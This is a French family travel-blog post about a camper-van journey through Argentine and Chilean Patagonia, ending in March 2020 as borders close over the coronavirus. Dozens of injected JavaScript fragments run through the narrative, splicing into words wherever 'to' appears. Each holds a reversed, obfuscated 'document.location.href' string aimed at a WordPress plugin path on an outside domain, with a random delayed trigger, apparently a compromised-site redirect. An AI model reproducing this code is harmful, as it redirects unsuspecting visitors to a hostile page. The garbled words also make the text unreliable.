De El Bolson à Malalcahuello

by

Nous avons rendez vous le 1er mars avec mon amie Amandine, dite “la baroudeuse” à Puertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Montt. Nous nous organisons pour être là, à l’heure. Notre planning nous permet de repasser en Argentine (ah qu’est ce qu’on aime les passages de frontières…) pour faire un toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour dans le Parque National Los Alerces. L’alerce est un conifère avec une durée de vie impressionnante. Le plus âgé du parc a 3000 ans. Pendant trois jours nous faisons quelques balades et pourrons admirer un alerce de plus de 800 ans (pas mal non !).

Nous continuons vers le nord et après prés de 10 jours passés sur du ripio nous retrouvons enfin les routes goudronnées. Nous nous arrêtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons dans la jolie petite ville d’El Bolson. Ancien village hippie, El Bolson a gardé une âme bohème. Le marché artisanal est très fourni, on retrouve à nouveau de bons fruits BIO. Une fois n’est pas coutume, on s’arrête quelques jours dans un agréable camping pour se reposer et surtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout se débarrasser de la poussière qui s’est installée partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout dans le camion. En Argentine les vacances scolaires sont terminées, à part une autre famille française dont le fils Hugo a beaucoup joué avec Clément, nous sommes les seuls clients. Le camping a, oh miracle, un ASPIRATEUR !!! Le bonheur !!! La poussière n’y résistera pas.

Un peu plus loin nous passons par Bariloche et ses célèbres chocolateries. Nous nous arrêtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons en dehors de la ville au bord du lac, et faisons la connaissance de Rodrigo et Paola, 2 argentins qui après avoir combattu une grave maladie ont décidé de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout quitter pour passer leur vie à voyager dans leur vieille Chevrolet de 1972. Un choix courageux et admirable, vivre dans cette petite camionnette demande un sacré état d’esprit. Avec eux, Claudia une chilienne francophone et son mari Patricio. Ils ont pour objectif de rallier l’Alaska avec leur camping-car. Nous passons un agréable moment toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous ensemble.

Retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour au Chili, au poste frontière, peut-être grâce aux multiple écrans TV qui diffusent les matchs de foot en direct, cette fois-ci nos victuailles ne seront pas confisquées !! En direction de Puertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Montt nous passons à proximité du volcan Osorno. Pour atteindre le pied du volcan, il y a une sacrée montée. 1200m de dénivelé en 10 km!!! (Amis cyclistes et runners, préparez vos mollets!!!) Arrivés en haut, deux télésièges nous permettent d’approcher un peu plus encore le sommet du volcan. Le bivouac dans ce lieu insolite nous offre un splendide coucher de soleil et le matin nous nous réveillons au-dessus d’une mer de nuages, le toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top !!!

Le lendemain nous récupérons Amandine à l’aéroport et partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons aussitôt vers l’île de Chiloé où nous avons prévu de passer plusieurs jours ensemble. La vie à 5 dans le camping-car s’organise, Amandine s’adapte rapidement à notre mode de vie et ses contraintes. Quel plaisir de se retrouver, si loin de notre Ardèche !!!
L’île de Chiloé est réputée pour son micro climat extrêmement pluvieux et brumeux. Pour nous, ce sera soleil et ciel bleu! Nous profitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons de cette jolie île et ses nombreuses églises en bois classées au Patrimoine mondial de l’UNESCO. Les maisons colorées de Castro, l’ambiance de la Isla Quinchao, mais aussi les soirées arrosées au rhum Paraguayen (nous avons fait le plein…), le bivouac et feu de camp sur la plage, le coup de foudre du vieux capitaine du bateau pour Amandine, le curantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to spécialité de fruits de mer …. cette virée sur Chiloe est douce et agréable. Il est déjà l’heure de raccompagner à l’aéroport notre baroudeuse ou plutôt “Badibadou” son nouveau surnom Chilote !

Nous organisons un rendez-vous avec Nico et Camille alias “les suiveurs d’étoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toiles” qui attendent un ferry pour rejoindre Puertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Montt. Leur planning est incertain, ils nous surprennent finalement au saut du lit, ils ont roulé une bonne partie de la nuit pour nous retrouver ! Nous passons avec eux un agréable journée au bord du lac Llanquihue où les enfants se baignent, pêchent et ramassent des mûres. Nous bivouaquons ensemble au pied du volcan Osorno et le lendemain nos routes se séparent à nouveau. Nous repassons côté Argentine dans le but d’aller parcourir la fameuse route des 7 lacs. Cette foi-ci, c’est la douane Argentine qui pour la première fois de notre voyage se montre pénible et nous confisque l’ensemble de nos fruits et légumes. La route des 7 lacs sera rapide, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les sentiers étant fermés pour cause d’invasion de rongeurs (à priori des rats…). Les différents lacs sont très beaux, reflétant tels des miroirs les forêts et montagnes les entoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tourant. A San Martin de Los Andes nous retrouvons par hasard Paola et Rodrigo (rencontré 1 semaine plus tôt à Bariloche) qui sont toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours avec Claudia et Patricio. Nous passons quelques jours ici, à nous balader dans les rues commerçantes de cette agréable petite ville.

Nous réalisons que c’est ici que nous quittoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons officiellement la Patagonie. Quelle chance d’avoir eu toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout ce temps pour découvrir toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous ces merveilleux paysages et surtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout quelle chance d’avoir eu un temps aussi clément, en deux mois pas une seule pluie !!!!

Nous repassons au Chili dans le but de découvrir la région des lacs et quelques parcs nationaux réputés, puis monter jusqu’à Santiago pour retrouver nos amis Lucia et Nico et leurs enfants. A la frontière on sent que le coronavirus commence à préoccuper les douaniers (enfin…) mais pour l’heure ce n’est pas le plus important pour nous, demain c’est les 11 ans de notre belle Alice. Pour sa journée d’anniversaire, ce sera bain dans les piscines d’eau chaudes naturelles des thermes, puis goûter d’anniversaire préparé par Clément et le soir restaurant de son choix dans Pucon. Son choix : Le meilleur restaurant de burgers de la ville, évidemment !!!! Le lendemain pour digérer ces énormes burgers nous tentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons une randonnée pour s’approcher du volcan Villarica, mais nous rebroussons chemin à cause de la pluie et du brouillard. Nous passerons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout de même une agréable nuit très calme au pied du volcan.
Frustrés de ce raté, nous retentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons notre chance deux jours plus tard dans la très jolie réserve Naturelle Cañi. Un long et raide sentier monte dans une forêt magnifique, pour arriver sur un plateau où nous pourrons admirer de petites lagunes plus jolies les unes que les autres. Ici l’arbre roi est l’Araucania. Il produit de gros pignons qui constituaient autrefois la base de l’alimentation des Mapuches. Encore plus haut c’est le mirador qui permet de découvrir les 4 volcans qui nous entoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tourent. La redescente est longue mais encore une fois les enfants nous impressionnent par leur endurance.

Depuis un moment, nous suivons attentivement l’évolution du coronavirus en Europe et les réactions des pays d’Amérique Latine. Au cours des derniers jours, la Colombie, la Bolivie, l’Equateur et le Pérou ont fermé leurs frontières et ont pris pour certains des mesures toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totales ou partielles de confinement. Au retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour de la randonnée nous décidons qu’il est préférable pour nous de retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tourner rapidement en Argentine. Nous nous hâtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons pour rejoindre le poste frontière le plus proche. En chemin, nous voyons bien que l’ambiance au Chili n’est plus la même. Les supermarchés sont pris d’assaut. A t’on raté une info officielle ? Par mesure de précautions on remplit nous aussi nos petites armoires. A 100 Km du but, nous devons nous arrêter pour bivouaquer. Nous sommes le 15 mars. Pendant la nuit l’Argentine annonce qu’elle ferme ses frontières. Nous voilà bloqués au Chili dans un pays dont le gouvernement ne semble pas avoir encore pris la mesure de ce qui se passe dans le monde…